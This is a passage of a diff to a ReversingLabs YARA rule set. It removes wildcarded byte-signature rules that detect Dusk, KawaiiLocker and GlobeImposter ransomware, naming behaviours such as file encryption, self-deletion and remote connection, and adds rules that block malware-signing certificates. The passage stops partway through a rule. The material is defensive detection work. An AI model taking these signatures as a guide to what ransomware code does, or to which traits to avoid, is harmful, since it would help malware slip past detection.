+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "fc13ac5880cc2c8eac9ff8d09f6c5c2055b2de54d460a284936a4f6cd78192e8"
 		score = 75
 		quality = 90
-		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
+		tags = "INFO, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "MALWARE"
-		tc_detection_type = "Ransomware"
-		tc_detection_name = "Dusk"
-		tc_detection_factor = 5
+		category = "INFO"
 		importance = 25
 
-	strings:
-		$encrypt_files_p1 = {
-            03 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 04 6F ?? ?? ?? ?? 0A 28 ?? ?? ?? ?? 06 6F ?? ?? ?? ??
-            0A 06 28 ?? ?? ?? ?? 0B 03 07 28 ?? ?? ?? ?? 03 03 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ??
-            ?? ?? ?? DE ?? 26 DE ?? 2A
-        }
-		$encrypt_files_p2 = {
-            14 0A 1E 8D ?? ?? ?? ?? 25 D0 ?? ?? ?? ?? 28 ?? ?? ?? ?? 0B 73 ?? ?? ?? ?? 0C 73 ?? ??
-            ?? ?? 0D 09 20 ?? ?? ?? ?? 6F ?? ?? ?? ?? 09 20 ?? ?? ?? ?? 6F ?? ?? ?? ?? 03 07 20 ??
-            ?? ?? ?? 73 ?? ?? ?? ?? 13 ?? 09 11 ?? 09 6F ?? ?? ?? ?? 1E 5B 6F ?? ?? ?? ?? 6F ?? ??
-            ?? ?? 09 11 ?? 09 6F ?? ?? ?? ?? 1E 5B 6F ?? ?? ?? ?? 6F ?? ?? ?? ?? 09 17 6F ?? ?? ??
-            ?? 08 09 6F ?? ?? ?? ?? 17 73 ?? ?? ?? ?? 13 ?? 11 ?? 02 16 02 8E 69 6F ?? ?? ?? ?? 11
-            ?? 6F ?? ?? ?? ?? DE ?? 11 ?? 2C ?? 11 ?? 6F ?? ?? ?? ?? DC 08 6F ?? ?? ?? ?? 0A DE ??
-            09 2C ?? 09 6F ?? ?? ?? ?? DC 08 2C ?? 08 6F ?? ?? ?? ?? DC 06 2A
-        }
-		$dusk_delete_itself = {
-            72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 0A 1A 8D ?? ?? ?? ?? 25 16
-            72 ?? ?? ?? ?? A2 25 17 72 ?? ?? ?? ?? 03 28 ?? ?? ?? ?? A2 25 18 72 ?? ?? ?? ?? 28 ??
-            ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? A2 25 19 72 ?? ?? ?? ?? A2 0B 06 07 28 ?? ?? ??
-            ?? 06 06 28 ?? ?? ?? ?? 18 60 28 ?? ?? ?? ?? 20 ?? ?? ?? ?? 28 ?? ?? ?? ?? 06 73 ?? ??
-            ?? ?? 25 17 6F ?? ?? ?? ?? 25 16 6F ?? ?? ?? ?? 28 ?? ?? ?? ?? 26 04 28 ?? ?? ?? ?? 28
-            ?? ?? ?? ?? DE ?? 26 DE ?? 2A
-        }
-		$find_files = {
-            20 ?? ?? ?? ?? 72 ?? ?? ?? ?? A2 25 20 ?? ?? ?? ?? 72 ?? ?? ?? ?? A2 25 20 ?? ?? ?? ??
-            72 ?? ?? ?? ?? A2 0A 1F ?? 8D ?? ?? ?? ?? 25 16 1F ?? 28 ?? ?? ?? ?? A2 25 17 1E 28 ??
-            ?? ?? ?? A2 25 18 1F ?? 28 ?? ?? ?? ?? A2 25 19 1F ?? 28 ?? ?? ?? ?? A2 25 1A 1F ?? 28
-            ?? ?? ?? ?? A2 25 1B 1B 28 ?? ?? ?? ?? A2 25 1C 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 72 ?? ??
-            ?? ?? 28 ?? ?? ?? ?? A2 25 1D 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ??
-            ?? A2 25 1E 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? A2 25 1F ?? 72
-            ?? ?? ?? ?? 28 ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? A2 0B 16 0C 2B ?? 07 08 9A 0D
-            1F ?? 28 ?? ?? ?? ?? 13 ?? 09 72 ?? ?? ?? ?? 17 28 ?? ?? ?? ?? 13 ?? 16 13 ?? 2B ?? 11
-            ?? 11 ?? 9A 28 ?? ?? ?? ?? 13 ?? 06 11 ?? 28 ?? ?? ?? ?? 2C ?? 02 11 ?? 11 ?? 9A 11 ??
-            28 ?? ?? ?? ?? 11 ?? 17 58 13 ?? 11 ?? 11 ?? 8E 69 32 ?? 00 02 09 28 ?? ?? ?? ?? DE ??
-            26 DE ?? 08 17 58 0C 08 07 8E 69 32 ?? 02 7B ?? ?? ?? ?? 6F ?? ?? ?? ?? 20 ?? ?? ?? ??
-            28 ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ??
-            ?? 26 DE ?? 26 DE ?? 20 ?? ?? ?? ?? 28 ?? ?? ?? ?? 02 7B ?? ?? ?? ?? 72 ?? ?? ?? ?? 20
-            ?? ?? ?? ?? 6F ?? ?? ?? ?? 2A
-        }
+	condition:
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Direct Systems Ltd" and pe.signatures [ i ] . serial == "36:a7:7d:37:e6:8e:02:fd:3d:04:3c:71:97:e0:44:ca" and 1515542400 <= pe.signatures [ i ] . not_after )
+}
+
+rule REVERSINGLABS_Cert_Blocklist_73Bff2Fb714F986C1707165F0B0F2E0E : INFO FILE
+{
+	meta:
+		description = "Certificate used for digitally signing malware."
+		author = "ReversingLabs"
+		id = "f014b446-0ddc-51df-898c-200bd60181a0"
+		date = "2023-11-08"
+		modified = "2023-11-08"
+		reference = "ReversingLabs"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L14040-L14056"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "d79ab926cbc0049d39f5f4c6e57afc71b1a30311a4816fdb66a9c2e257cc84af"
+		score = 75
+		quality = 90
+		tags = "INFO, FILE"
+		status = "RELEASED"
+		sharing = "TLP:WHITE"
+		category = "INFO"
+		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and ( $find_files ) and ( all of ( $encrypt_files_p* ) ) and ( $dusk_delete_itself )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Tecnopolis Consulting Ltd" and pe.signatures [ i ] . serial == "73:bf:f2:fb:71:4f:98:6c:17:07:16:5f:0b:0f:2e:0e" and 1090886400 <= pe.signatures [ i ] . not_after )
 }
-rule REVERSINGLABS_Win32_Ransomware_Kawaiilocker : TC_DETECTION MALICIOUS MALWARE FILE
+
+rule REVERSINGLABS_Cert_Blocklist_33B24170694Ca0Cf4D2Bdf4Aadf475A3 : INFO FILE
 {
 	meta:
-		description = "Yara rule that detects KawaiiLocker ransomware."
+		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "8c368e2d-3c6f-5c4b-880b-ebdb06dcf901"
-		date = "2020-08-17"
-		modified = "2020-08-17"
+		id = "c02d7aaf-e88a-5aba-a8ee-db34562e53b1"
+		date = "2023-11-08"
+		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/ransomware/Win32.Ransomware.KawaiiLocker.yara#L1-L135"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "d86b41ef1c43da55869ad26facd5efdf232277f0e33483690a69a04c4ba8f7da"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L14058-L14074"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "795bcb46b41ded084e4d12d98e335748ec1db3e0abbbb2d933e819d955075138"
 		score = 75
 		quality = 90
-		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
+		tags = "INFO, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "MALWARE"
-		tc_detection_type = "Ransomware"
-		tc_detection_name = "KawaiiLocker"
-		tc_detection_factor = 5
+		category = "INFO"
 		importance = 25
 
-	strings:
-		$search_files = {
-            55 8B EC 51 B9 ?? ?? ?? ?? 6A ?? 6A ?? 49 75 ?? 51 87 4D ?? 53 56 57 88 4D ?? 89 55
-            ?? 89 45 ?? 8B 45 ?? E8 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 8B 15
-            ?? ?? ?? ?? E8 ?? ?? ?? ?? 33 C0 55 68 ?? ?? ?? ?? 64 FF 30 64 89 20 8B 45 ?? E8 ??
-            ?? ?? ?? 8B 55 ?? 80 7C 02 ?? ?? 75 ?? 8B 45 ?? E8 ?? ?? ?? ?? 8B D0 4A 8D 45 ?? E8
-            ?? ?? ?? ?? FF 75 ?? 68 ?? ?? ?? ?? FF 75 ?? 8D 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ??
-            ?? ?? ?? 8B 85 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 0F
-            85 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8B D0 83 CA ?? 3B D0 75 ?? 80 7D ?? ?? 0F 85 ?? ??
-            ?? ?? 8B 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 8B 85 ?? ??
-            ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? FF 75 ?? 68 ?? ?? ?? ?? FF B5
-            ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8A 4D
-            ?? 8B 55 ?? E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? BE ?? ?? ?? ?? BB ?? ?? ?? ?? FF 75 ?? 68
-            ?? ?? ?? ?? FF B5 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85
-            ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? E8
-            ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8B 13 E8 ?? ?? ?? ?? 0F 85 ?? ?? ?? ?? FF 75 ?? 68 ??
-            ?? ?? ?? FF B5 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ??
-            ?? ?? ?? 8D 95 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 8D
-            95 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? B8 ?? ?? ?? ?? E8 ?? ?? ??
-            ?? 85 C0 75 ?? FF 75 ?? 68 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? BA ?? ??
-            ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8B 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 84 C0 74 ??
-            FF 75 ?? 68 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ??
-            ?? ?? 8B 95 ?? ?? ?? ?? A1 ?? ?? ?? ?? 8B 08 FF 51 ?? 83 C3 ?? 4E 0F 85 ?? ?? ?? ??
-            E9 ?? ?? ?? ?? 8B BD ?? ?? ?? ?? 8B C7 83 C8 ?? 3B C7 75 ?? 80 7D ?? ?? 0F 85 ?? ??
-            ?? ?? 8B 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 8B 85 ?? ??
-            ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? FF 75 ?? 68 ?? ?? ?? ?? FF B5
-            ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8A 4D
-            ?? 8B 55 ?? E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? BE ?? ?? ?? ?? BB ?? ?? ?? ?? FF 75 ?? 68
-            ?? ?? ?? ?? FF B5 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85
-            ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? E8
-            ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8B 13 E8 ?? ?? ?? ?? 0F 85 ?? ?? ?? ?? FF 75 ?? 68 ??
-            ?? ?? ?? FF B5 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ??
-            ?? ?? ?? 8D 95 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 8D
-            95 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? B8 ?? ?? ?? ?? E8 ?? ?? ??
-            ?? 85 C0 75 ?? FF 75 ?? 68 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? BA ?? ??
-            ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8B 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 84 C0 74 ??
-            FF 75 ?? 68 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ??
-            ?? ?? 8B 95 ?? ?? ?? ?? A1 ?? ?? ?? ?? 8B 08 FF 51 ?? 83 C3 ?? 4E 0F 85 ?? ?? ?? ??
-            8D 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? E8 ?? ??
-            ?? ?? 33 C0 5A 59 59 64 89 10 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ??
-            ?? ?? ?? 8D 85 ?? ?? ?? ?? 8B 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 45 ?? BA ?? ?? ?? ??
-            E8 ?? ?? ?? ?? C3
-        }
-		$remote_connection = {
-            55 68 ?? ?? ?? ?? 64 FF 30 64 89 20 B2 ?? A1 ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 45 ?? B2
-            ?? A1 ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 45 ?? 8D 55 ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B
-            45 ?? 50 8D 55 ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 55 ?? 8D 45 ?? 59 E8 ?? ?? ?? ??
-            8D 4D ?? BA ?? ?? ?? ?? 33 C0 E8 ?? ?? ?? ?? FF 75 ?? 8D 45 ?? E8 ?? ?? ?? ?? FF 75
-            ?? 8D 4D ?? BA ?? ?? ?? ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? FF 75 ?? FF 75 ?? 8D 45 ??
-            BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 4D ?? BA ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 8B 45
-            ?? 8B 50 ?? 8B 45 ?? 8B 08 FF 51 ?? 8D 55 ?? 8B 45 ?? 8B 08 FF 51 ?? 8B 45 ?? 8D 55
-            ?? E8 ?? ?? ?? ?? 8B 55 ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 74 ?? 6A ?? E8 ?? ??
-            ?? ?? 8D 45 ?? E8 ?? ?? ?? ?? 8D 45 ?? E8 ?? ?? ?? ?? 8B C3 8B 55 ?? E8 ?? ?? ?? ??
-            33 C0 5A 59 59 64 89 10 68 ?? ?? ?? ?? 8D 45 ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? C3
-        }
-		$encrypt_files = {
-            55 8B EC 6A ?? 6A ?? 6A ?? 53 56 57 BB ?? ?? ?? ?? 33 C0 55 68 ?? ?? ?? ?? 64 FF 30
-            64 89 20 B2 ?? A1 ?? ?? ?? ?? E8 ?? ?? ?? ?? A3 ?? ?? ?? ?? B2 ?? A1 ?? ?? ?? ?? E8
-            ?? ?? ?? ?? A3 ?? ?? ?? ?? E8 ?? ?? ?? ?? A3 ?? ?? ?? ?? A1 ?? ?? ?? ?? 8B 10 FF 52
-            ?? 8B F0 8B C3 BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 43 ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ??
-            8D 43 ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 43 ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 43
-            ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 43 ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 43 ?? BA
-            ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 43 ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 43 ?? BA ?? ??
-            ?? ?? E8 ?? ?? ?? ?? 8D 43 ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 43 ?? BA ?? ?? ?? ??
-            E8 ?? ?? ?? ?? 8D 43 ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 43 ?? BA ?? ?? ?? ?? E8 ??
-            ?? ?? ?? 8D 43 ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 43 ?? BA ?? ?? ?? ?? E8 ?? ?? ??
-            ?? 8D 43 ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 43 ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D
-            43 ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 43 ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 43 ??
-            BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 43 ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 43 ?? BA ??
-            ?? ?? ?? E8 ?? ?? ?? ?? 8D 43 ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 43 ?? BA ?? ?? ??
-            ?? E8 ?? ?? ?? ?? 8D 43 ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 43 ?? BA ?? ?? ?? ?? E8
-            ?? ?? ?? ?? 8D 43 ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 43 ?? BA ?? ?? ?? ?? E8 ?? ??
-            ?? ?? 8D 43 ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 43 ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ??
-            8D 43 ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 43 ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 83
-            ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 83 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ??
-            ?? ?? 8D 83 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 83 ?? ?? ?? ?? BA ?? ?? ??
-            ?? E8 ?? ?? ?? ?? 8D 83 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 83 ?? ?? ?? ??
-            BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 83 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 83
-            ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 83 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ??
-            ?? ?? 8D 83 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 83 ?? ?? ?? ?? BA ?? ?? ??
-            ?? E8 ?? ?? ?? ?? 8D 83 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 83 ?? ?? ?? ??
-            BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 83 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 83
-            ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 83 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ??
-            ?? ?? 8D 83 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 83 ?? ?? ?? ?? BA ?? ?? ??
-            ?? E8 ?? ?? ?? ?? 8D 83 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 83 ?? ?? ?? ??
-            BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 83 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 83
-            ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 83 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ??
-            ?? ?? 8D 83 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 83 ?? ?? ?? ?? BA ?? ?? ??
-            ?? E8 ?? ?? ?? ?? 8D 83 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 83 ?? ?? ?? ??
-            BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 83 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 83
-            ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 83 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ??
-            ?? ?? 8D 83 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 83 ?? ?? ?? ?? BA ?? ?? ??
-            ?? E8 ?? ?? ?? ?? 8D 83 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 83 ?? ?? ?? ??
-            BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 83 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 83
-            ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 83 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ??
-            ?? ?? 8D 83 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 83 ?? ?? ?? ?? BA ?? ?? ??
-            ?? E8 ?? ?? ?? ?? 8D 83 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 83 ?? ?? ?? ??
-            BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 83 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 83
-            ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 83 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ??
-            ?? ?? 8D 83 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 83 ?? ?? ?? ?? BA ?? ?? ??
-            ?? E8 ?? ?? ?? ?? 8D 83 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 83 ?? ?? ?? ??
-            BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 83 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 83
-            ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 83 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ??
-            ?? ?? 8D 83 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 83 ?? ?? ?? ?? BA ?? ?? ??
-            ?? E8 ?? ?? ?? ?? 8B DE 4B 85 DB 7C ?? 43 33 F6 8D 55 ?? 33 C0 E8 ?? ?? ?? ?? 8B 45
-            ?? 8D 55 ?? E8 ?? ?? ?? ?? 8D 45 ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 55 ?? A1 ?? ??
-            ?? ?? 8B 08 FF 51 ?? 8D 4D ?? 8B D6 A1 ?? ?? ?? ?? 8B 38 FF 57 ?? 8B 45 ?? B1 ?? BA
-            ?? ?? ?? ?? E8 ?? ?? ?? ?? 46 4B 75 ?? E8 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 68 ?? ??
-            ?? ?? 6A ?? E8 ?? ?? ?? ?? 6A ?? E8
-        }
+	condition:
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Yu Bao" and pe.signatures [ i ] . serial == "33:b2:41:70:69:4c:a0:cf:4d:2b:df:4a:ad:f4:75:a3" and 1474934400 <= pe.signatures [ i ] . not_after )
+}
+
+rule REVERSINGLABS_Cert_Blocklist_3A9Bdec10E00E780316Baaebfe7A772C : INFO FILE
+{
+	meta:
+		description = "Certificate used for digitally signing malware."
+		author = "ReversingLabs"
+		id = "56f62454-84a1-5843-b2f4-fa84b37040f3"
+		date = "2023-11-08"
+		modified = "2023-11-08"
+		reference = "ReversingLabs"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L14076-L14092"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "ea9bc11efd2969f6b7112338f2b084ea3551e072e46b1162bd47b08be549cdd4"
+		score = 75
+		quality = 90
+		tags = "INFO, FILE"
+		status = "RELEASED"
+		sharing = "TLP:WHITE"
+		category = "INFO"
+		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and $search_files and $encrypt_files and $remote_connection
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "PLAN ALPHA LIMITED" and pe.signatures [ i ] . serial == "3a:9b:de:c1:0e:00:e7:80:31:6b:aa:eb:fe:7a:77:2c" and 1556582400 <= pe.signatures [ i ] . not_after )
 }
-rule REVERSINGLABS_Win32_Ransomware_Globeimposter : TC_DETECTION MALICIOUS MALWARE FILE
+
+rule REVERSINGLABS_Cert_Blocklist_7Cad9C37F7Affa8F4D8229F97607E265 : INFO FILE
 {
 	meta:
-		description = "Yara rule that detects GlobeImposter ransomware."
+		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "6634a554-b4bb-503d-a4f1-9997b4caa1f0"
-		date = "2020-07-15"
-		modified = "2020-07-15"
+		id = "dae6b474-e4f0-5c73-b32e-d2680f508799"
+		date = "2023-11-08"
+		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/ransomware/Win32.Ransomware.GlobeImposter.yara#L1-L171"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "4345a767f270428f3b509fdad5a96bf9b494b190d3a836c4bf53dfd75da5bacb"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L14094-L14110"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "0f88989c64bece23e7eccf8022e038fdd9c360766de71268cf71616f74adc56c"
 		score = 75
 		quality = 90
-		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
+		tags = "INFO, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "MALWARE"
-		tc_detection_type = "Ransomware"
-		tc_detection_name = "GlobeImposter"
-		tc_detection_factor = 5
+		category = "INFO"
 		importance = 25
 
-	strings:
-		$encrypt_files_1 = {
-            81 EC ?? ?? ?? ?? 83 24 24 ?? 6A ?? FF B4 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 50 8D 44 24
